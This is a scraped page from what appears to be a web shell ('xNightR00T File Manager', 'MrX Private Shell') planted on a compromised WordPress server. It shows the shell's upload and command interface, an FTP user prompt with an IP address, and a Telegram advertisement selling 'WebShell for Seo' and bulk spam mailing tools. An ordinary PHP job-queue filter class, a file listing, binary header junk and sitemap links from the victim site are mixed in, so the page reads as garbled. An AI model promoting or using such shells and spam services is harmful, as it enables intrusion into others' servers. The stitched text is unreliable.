xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace JobQueue\Filter;

class Translator
{
    /**
     * \JobQueue\Filter\Filter
     * @var $filter
     */
    protected $filter;

    public function __construct(\JobQueue\Filter\Filter $filter)
    {
        $this->filter = $filter;
    }

    /**
     * @return \JobQueue\Filter\Filter
     */
    public function getFilter()
    {
        return $this->filter;
    }

    public function translate()
    {
        $translation = array();
        $dictionary  = $this->getFilter()->getDictionary();

        if (is_array($this->getFilter()->getApplicationIds()) && count($this->getFilter()->getApplicationIds())) {
            $translation[Dictionary::FILTER_COLUMN_APP_IDS] = $this->getFilter()->getApplicationIds();
        }

        if ($this->getFilter()->getName()) {
            $translation[Dictionary::COLUMN_NAME] = $this->getFilter()->getName();
        }

        if ($this->getFilter()->getScript()) {
            $translation[Dictionary::COLUMN_SCRIPT] = $this->getFilter()->getScript();
        }

        if ($this->getFilter()->getJobType()) {
            $translation[Dictionary::COLUMN_TYPE] = $dictionary->jobqueueTypeToDbValue($this->getFilter()->getJobType());
            
            if (empty($translation[Dictionary::COLUMN_TYPE])) {
                unset($translation[Dictionary::COLUMN_TYPE]);
            }
        }

        if ($this->getFilter()->getPriority()) {
            $translation[Dictionary::COLUMN_PRIORITY] = $dictionary->prioritiesToDbValues($this->getFilter()->getPriority());
        }

        if ($this->getFilter()->getStatuses()) {
            $translation[Dictionary::COLUMN_STATUS] = $dictionary->statusesToDbValues($this->getFilter()->getStatuses());
        }

        if ($this->getFilter()->getRuleIds()) {
            $translation[Dictionary::FILTER_COLUMN_RULE_IDS] = $this->getFilter()->getRuleIds();
        }

        if ($this->getFilter()->getQueueIds()) {
            $translation[Dictionary::FILTER_COLUMN_QUEUE_IDS] = $this->getFilter()->getQueueIds();
        }

        if ($this->getFilter()->getScheduledBefore()) {
            $translation[Dictionary::FILTER_COLUMN_SCHEDULED_BEFORE] = $this->translateTimestamp($this->getFilter()->getScheduledBefore());
        }

        if ($this->getFilter()->getScheduledAfter()) {
            $translation[Dictionary::FILTER_COLUMN_SCHEDULED_AFTER] = $this->translateTimestamp($this->getFilter()->getScheduledAfter());
        }

        if ($this->getFilter()->getExecutedBefore()) {
            $translation[Dictionary::FILTER_COLUMN_EXECUTED_BEFORE] = $this->translateTimestamp($this->getFilter()->getExecutedBefore());
        }

        if ($this->getFilter()->getExecutedAfter()) {
            $translation[Dictionary::FILTER_COLUMN_EXECUTED_AFTER] = $this->translateTimestamp($this->getFilter()->getExecutedAfter());
        }

        if ($this->getFilter()->getFreeText()) {
            $translation[Dictionary::FILTER_COLUMN_FREE_TEXT] = $this->getFilter()->getFreeText();
        }

        if ($this->getFilter()->getRetries()) {
            $translation[Dictionary::FILTER_COLUMN_RETRIES] = $this->getFilter()->getRetries();
        }

        return $translation;
    }

    protected function translateTimestamp($timestamp)
    {
        $timestamp = intval($timestamp);
        $date      = new \DateTime("@{$timestamp}");
        $date->setTimezone(new \DateTimeZone(date_default_timezone_get()));
        // in 9.1 the time fields changed the format - 'c', but still freezed
        return $date->format('Y-m-d H:i:s');
    }
}

Filemanager

Name Type Size Permission Actions
Dictionary.php File 18.47 KB 0644
Filter.php File 7.9 KB 0644
Translator.php File 3.49 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml